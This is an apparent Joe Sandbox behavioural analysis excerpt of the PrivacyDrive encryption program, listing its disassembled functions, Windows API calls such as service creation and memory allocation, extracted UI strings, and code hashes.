                                control_flow_graph 1466 51df073-51df0b8 1467 51df0ba 1466->1467 1468 51df0e4-51df103 SysAllocString 1466->1468 1469 51df0c0-51df0e2 call 51e2e00 1467->1469 1471 51df107-51df109 1468->1471 1469->1468
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 051DF0E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocString
                                • String ID: n;L9$p3w1$y/z-
                                • API String ID: 2525500382-3403012672
                                • Opcode ID: f27f4dda3722be76bea796432f66e25f1c6fa7c285570382cb6a4f21e703e267
                                • Instruction ID: df243d910ed04c145c2888e79762a87ba8597e84f265336cd2b454945df4daef
                                • Opcode Fuzzy Hash: f27f4dda3722be76bea796432f66e25f1c6fa7c285570382cb6a4f21e703e267
                                • Instruction Fuzzy Hash: 3D1169B8110B01EFD3208F25C194A26FBB2FF46701B408A0CE4A68BA51D734F952CFA0
                                Function 00FDD227 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1549 fdd227-fdd23a 1550 fdd23c-fdd23f 1549->1550 1551 fdd252-fdd25c 1549->1551 1552 fdd241-fdd244 1550->1552 1553 fdd25e-fdd266 1551->1553 1554 fdd26b-fdd277 1551->1554 1552->1551 1555 fdd246-fdd250 1552->1555 1553->1554 1556 fdd27a-fdd27f 1554->1556 1555->1551 1555->1552 1557 fdd281-fdd28c 1556->1557 1558 fdd2b2-fdd2b9 LoadLibraryA 1556->1558 1560 fdd28e-fdd2a6 call fdd94b 1557->1560 1561 fdd2a8-fdd2ac 1557->1561 1559 fdd2bc-fdd2c0 1558->1559 1560->1561 1565 fdd2c1-fdd2c3 1560->1565 1561->1556 1562 fdd2ae-fdd2b0 1561->1562 1562->1558 1562->1559 1565->1559
                                APIs
                                • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00FDD2B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: .dll
                                • API String ID: 1029625771-2738580789
                                • Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
                                • Instruction ID: ec747832b010c501221f6a94be82cc90140069d395ff660135b0e9a529661433
                                • Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
                                • Instruction Fuzzy Hash: 0921E472A006859FDB22CFA8C884B6D7BA5AF46331F1D416ED8469BB41D770EC45D780
                                Function 051DF66B Relevance: 3.1, APIs: 2, Instructions: 88memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1566 51df66b-51df684 1567 51df6b4-51df734 SysAllocString 1566->1567 1568 51df686 1566->1568 1570 51df764-51df77c SysAllocString 1567->1570 1571 51df736 1567->1571 1569 51df690-51df6b2 call 51e2e60 1568->1569 1569->1567 1576 51df780 1570->1576 1573 51df740-51df762 call 51e2ef0 1571->1573 1573->1570 1576->1576
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocString
                                • String ID:
                                • API String ID: 2525500382-0
                                • Opcode ID: 183aa50177f57a1b48117183cb03dfdd9fdcc0b27d903d91067752830fb3bb85
                                • Instruction ID: 451761fa28fd2f644917b419d1470262244476b8b690ba9838003afab8282d47
                                • Opcode Fuzzy Hash: 183aa50177f57a1b48117183cb03dfdd9fdcc0b27d903d91067752830fb3bb85
                                • Instruction Fuzzy Hash: 943122B4110700DBEB20DFA4C5D4A06BBF6FF09700B048A8CE86A8FB4AD375E955CB64
                                Function 00FDBE45 Relevance: 1.6, APIs: 1, Instructions: 318memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FDBEBE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
                                • Instruction ID: a3391e8fd2c31979cf796d2886677e8d5aac953207ec66820be9f5471e7252f0
                                • Opcode Fuzzy Hash: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
                                • Instruction Fuzzy Hash: 6BB1B072900603EBDB219F64CC85BABB7AABF09324F18051BF95982251E735F950FB91
                                Function 051E3176 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlFreeHeap.NTDLL(?,00000000), ref: 051E31D3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 40de2a31329b681e8b566398932dde73bc63bb6d1b8f91e7cf3bb22e38e8c7e2
                                • Instruction ID: 76d3f8da3d001860eae6adf27ecbe3d579632672d76776ba7654e571d84e0495
                                • Opcode Fuzzy Hash: 40de2a31329b681e8b566398932dde73bc63bb6d1b8f91e7cf3bb22e38e8c7e2
                                • Instruction Fuzzy Hash: 77F0B23421C240ABD305AF58D998A1EBBF9EB5A601F948C1CF1C997262C736E860DB56
                                Function 051DF5FB Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 051DF637
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InformationVolume
                                • String ID:
                                • API String ID: 2039140958-0
                                • Opcode ID: 9a0e82141060087abf24c87ff1c10319f02ba96b004a70a5504cd805d89079d0
                                • Instruction ID: b1bad141a5d385737c116c8d43e7fb245c91dfed003e96f31af481e5508e18d4
                                • Opcode Fuzzy Hash: 9a0e82141060087abf24c87ff1c10319f02ba96b004a70a5504cd805d89079d0
                                • Instruction Fuzzy Hash: 30E09274340700FFE7209B20DC97F157669AB05B01F240414FA01AB3D0D775B801CB15
                                Function 051DF06E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 051DF637
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InformationVolume
                                • String ID:
                                • API String ID: 2039140958-0
                                • Opcode ID: 05fb79b5bec5828340ad0dec2198d6719df4af0e432f8c34ae5bca8c95be313d
                                • Instruction ID: 69b02e691c7297edd18b95699f1ef153ca51f0ddf2dd1656d809fa51835293d4
                                • Opcode Fuzzy Hash: 05fb79b5bec5828340ad0dec2198d6719df4af0e432f8c34ae5bca8c95be313d
                                • Instruction Fuzzy Hash: AEE05E70390700BBF7305B20AC53F2575699B01F05F300414B7017A5E0EBB578109B29
                                Function 051B2631 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 051B2643
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InitializeSecurity
                                • String ID:
                                • API String ID: 640775948-0
                                • Opcode ID: 6839a76b48b902652d3ef35950c8ca8d21adab82751ca16e6a2cc3f30c1a88c4
                                • Instruction ID: b8065a2ae48eeae0cfdd749470e43a3f9b21765374c8b5fd812990b9040514ae
                                • Opcode Fuzzy Hash: 6839a76b48b902652d3ef35950c8ca8d21adab82751ca16e6a2cc3f30c1a88c4
                                • Instruction Fuzzy Hash: 32D048303E8300B6F2301A4CBC1BF083914A302F22FB00700B3217C0C58DE03142862D
                                Function 051DF113 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 051DF123
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: BlanketProxy
                                • String ID:
                                • API String ID: 3890896728-0
                                • Opcode ID: e1a3d213d4f14a88f00466caf0bf09c268f6a0c37e5d6d38b39210923620c9b8
                                • Instruction ID: fb200cfa05f0a6980a69ee3006b821e050d94057d844c0c5021e17fb0b9fcd8e
                                • Opcode Fuzzy Hash: e1a3d213d4f14a88f00466caf0bf09c268f6a0c37e5d6d38b39210923620c9b8
                                • Instruction Fuzzy Hash: D6C04C347D0301B6F2311A14FC1BF043A14B706F02F600110F3417C0D08EE166A19659
                                Function 051E3142 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 051E3148
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: bf685efc43b2155ba8fd778383e41b0e1649c39f2da12783b995f1b3403c0f9e
                                • Instruction ID: 4110079aff59e45559347d4af79baf6485120b5760e98d956ec0144b5b4b9e69
                                • Opcode Fuzzy Hash: bf685efc43b2155ba8fd778383e41b0e1649c39f2da12783b995f1b3403c0f9e
                                • Instruction Fuzzy Hash: C1B01230140010AFD5501B04BC0AF833F249F40250F010050F004480F1C51148E5C6E5
                                Function 051B2610 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 051B2621
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 5b110860a97b6809eac9afde76bd2aa95b9223429d13116fd98782b8a35847ac
                                • Instruction ID: f63540b76b788dc9520247d846cb359e378798f7a8bc0ae8ffe4ba40e0063607
                                • Opcode Fuzzy Hash: 5b110860a97b6809eac9afde76bd2aa95b9223429d13116fd98782b8a35847ac
                                • Instruction Fuzzy Hash: EEC08C20064208A7F2102A6DAC0BF063D2C9347762F800320F9A0440C26E602455C2B6

                                Non-executed Functions

                                Function 0041D320 Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 202serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,7563D392,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D35D
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF,?,00410160,?), ref: 0041D36A
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF), ref: 0041D375
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF,?,00410160,?), ref: 0041D37C
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF), ref: 0041D387
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF,?,00410160,?), ref: 0041D38E
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0041D431
                                • CreateServiceW.ADVAPI32(00000000,PrivacyDrive,PrivacyDrive,000F01FF,00000001,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0041D461
                                • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 0041D47C
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D485
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D491
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0041D4F0
                                • CreateServiceW.ADVAPI32(00000000,PDSvc,PrivacyDrive Service,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0041D51F
                                • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 0041D539
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D540
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D54C
                                • GetLastError.KERNEL32 ref: 0041D558
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$ManagerOpen$ChangeConfig2Create$ErrorLast
                                • String ID: !@$ V$%s%s$%spdsvc.exe$Drivers\pdv.sys$Drivers\pdv64.sys$PDSvc$Privacy Drive Encryption Engine Driver$PrivacyDrive$PrivacyDrive Service
                                • API String ID: 3379103096-671622587
                                • Opcode ID: e211ec5323f855e231afb5620a5a057e52a2b5e24d2cbd0302a1c7a6ed5680cc
                                • Instruction ID: b452f98a8033bf9f68e19ff2e294d75b6f98f50a34ea6d262c5011a92e58c42d
                                • Opcode Fuzzy Hash: e211ec5323f855e231afb5620a5a057e52a2b5e24d2cbd0302a1c7a6ed5680cc
                                • Instruction Fuzzy Hash: 2E715AB1E41308AADB10DFA5DC4ABEEBBB5BF18715F10012AF500B72D0D7B5A948CB64
                                Function 0049B470 Relevance: 46.2, APIs: 8, Strings: 18, Instructions: 650windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B58F
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B654
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B76F
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B7D5
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B9A0
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049BC51
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049BD4F
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049BD7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek$_malloc
                                • String ID: ADD_TO_FAVORITES_1$CHANGE_PASSWORD$CLOSE$CLOSE_ALL$DELETE_FROM_DISK$DISMOUNT$DISMOUNTALL$FAVORITES$Item$MOUNT1$MOVE_DOWN$MOVE_UP$Menu$OPEN$OPEN_FILE_LOCATION$PROPERTIES$REFRESH$REMOVE_FROM_FAVORITES
                                • API String ID: 703162041-640977299
                                • Opcode ID: 3d65e8f234e4143a1968098b70c06f5c93d839079b06c9fdb75d6c388c50a9fd
                                • Instruction ID: 8658cc561e65f14d6aa1a5edf7c6d9d64546e0c6573e34239193dc2d782e3f8f
                                • Opcode Fuzzy Hash: 3d65e8f234e4143a1968098b70c06f5c93d839079b06c9fdb75d6c388c50a9fd
                                • Instruction Fuzzy Hash: FF328130344340AFEB10DF55D996F6ABBE8FB94705F04092EF641962D1D7B8E908CB9A
                                Function 004AEBE0 Relevance: 28.7, APIs: 5, Strings: 11, Instructions: 667COMMON
                                Download Yara Rule
                                APIs
                                • SHFileOperationW.SHELL32(005BDD7C,?,?,?,?,?,?,?,?,?,?,?,7563D392,?,005BDD7C), ref: 004AEE55
                                • SHFileOperationW.SHELL32(005BDD7C,?,?,?,?,?,?,?,?,?,?,?,7563D392,?,005BDD7C), ref: 004AF41A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileOperation
                                • String ID: 0025$0026$Tasks.cpp$[$[$[$[$[$[$[$[
                                • API String ID: 3080627654-3919369503
                                • Opcode ID: a09f4e60b06d188126161e635b8690bbce2668f5e54b791081c7c4dc7ae6a5b2
                                • Instruction ID: 26218ae8d88f00fd96197a46de8a2eb87e1ad25fa742eae6cd5fbc65985532f9
                                • Opcode Fuzzy Hash: a09f4e60b06d188126161e635b8690bbce2668f5e54b791081c7c4dc7ae6a5b2
                                • Instruction Fuzzy Hash: D642E331A00204CFDB24DF95C895BAEB7B5EF66314F14053EE906AB391D7386909CBA9
                                Function 0045F770 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 729windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045F820
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045F8D4
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045F992
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FAEA
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FB4E
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FC1E
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FC78
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FDED
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FE5C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FEC2
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FF3D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00460078
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004600CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID: [$[
                                • API String ID: 2222842502-172125351
                                • Opcode ID: 69f94420443c5227c3e6658945dab2653e5e3fd36ec4916025096ce0b7ff5bfb
                                • Instruction ID: 4de34ae71ae56d1f3c43cc144817aa65dcdef855dddc74583266f8bfd0c0baf4
                                • Opcode Fuzzy Hash: 69f94420443c5227c3e6658945dab2653e5e3fd36ec4916025096ce0b7ff5bfb
                                • Instruction Fuzzy Hash: 7942E930740704BBEB14AA658C56FAD7265AF01715F20096FFB15AF2D2CBBC6D09874E
                                Function 004030E0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 279windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403199
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004031D3
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403203
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0040328A
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004032B8
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004033DE
                                • GetLastError.KERNEL32(?,00000001,00000001,?,?,7563D392), ref: 00403400
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000001,?,?,7563D392), ref: 0040341F
                                • LocalFree.KERNEL32(00000000,00000001,?,?,7563D392), ref: 0040344F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$ErrorFormatFreeLastLocal
                                • String ID: !@$%c:$0016$0022$0029
                                • API String ID: 34859679-1726813969
                                • Opcode ID: dc7b5e874a2ae3bdac38484c6e5221ba3121ef9d2838dd7060336bbf1e159380
                                • Instruction ID: aad7e1dcbf248032c4912018da71e11fe657b3157fb3b886884f3b6823c270f9
                                • Opcode Fuzzy Hash: dc7b5e874a2ae3bdac38484c6e5221ba3121ef9d2838dd7060336bbf1e159380
                                • Instruction Fuzzy Hash: C3B19171E00308AAEB10DFA4CC46FDEBEB8BB14715F14452AF514BB2D1D7B86A048B99
                                Function 0041D0B0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 126COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(?), ref: 0041D148
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D163
                                • GetLastError.KERNEL32 ref: 0041D16F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ErrorExistsFileLastManagerOpenPath
                                • String ID: !@$%spdsvc.exe$PDSvc$PrivacyDrive Service$This service is used by Privacy Drive to perform additional operations. If this service is stopped or disabled, it will cause abn
                                • API String ID: 2356968266-3248401929
                                • Opcode ID: 014782290989219da5f6e7d60fa5059e811b8199ec2d4ddce0a92b82a47dd6ea
